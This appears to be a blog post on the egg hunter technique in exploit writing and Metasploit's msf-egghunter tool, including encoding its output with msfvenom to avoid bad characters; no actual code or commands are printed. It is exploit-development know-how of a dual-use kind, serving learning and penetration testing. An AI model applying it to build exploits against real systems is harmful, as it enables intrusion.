A closer look to msf-egghunter
The egghunting is a technique used in exploit writing to deal with evil shellcode to be placed in a memory location different from the one we are redirected via EIP overwrite or SEH hijack or other.
The basic idea behind egg hunter is that shellcode is prepended by a 4 bytes long pattern which is repeated twice and a small routine will search into memory for this pattern. When the pattern it has been found, the routine will jump on that memory location that eventually contains the shellcode we want to execute.
Egg hunting technique is introduced in Safetly Searching Process Virtual Address Space paper by Matt Miller.
I wrote about egg hunting during my SLAE journey back in May 2018.
Today I want to introduce you the msf-egghunter tool by Metasploit Framework.
Instead of writing your egghunting routine from scratch (hint: do it at least one time in order to understand how it works), you have a ready to be used helper with your Metasploit installation.
The basic usage here is to specify the platform (windows or linux) and the architecture since the tool will produce different assembler code. The only mandatory parameter is the egg to be used, BEEF in our case.
What about bad characters than? Accordingly to the tool help message, with the ‘-b’ parameter you supply the characters to be avoided… but it doesn’t work.
My Metasploit version is 5.0.6-dev and if I need to avoid ‘\x66’ character in the latest example I have some trouble.
The usage combo I love most is the one with msfvenom. msfvenom is not good only to create shellcode, instead it could also read a code from standard input and apply some filters over it.
If we want to avoid the ‘\x66’ character in our egg hunter code, the best way to achieve it is to ask msfvenom to apply some encoding. Let’s do this way:
We asked msf-egghunter to output a raw output we pass to msfvenom specifying the list of bad characters. After the encoder pass, we can see there is no ‘\x66’ character in out code.
The msf-egghunter core is in the rex-exploit library by Rapid7, you can find the source code on GitHub.
Looking at the very beginning of the source code, we can read in the comments the improvements made starting from the Matt Miller’s work. Very clever code is the code to disable DEP for Windows platform made by corelandc0d3r
Off by one
Egg hunting is a very fun technique to be used in exploit development. You tell the machine to search the memory for the code it must use to compromise itself.
The best combination is with msfvenom to create fancy encoded version of your egg hunter.
And you? Which is your egg hunting usage when writing exploits? Do you write custom code or do you write some other tool?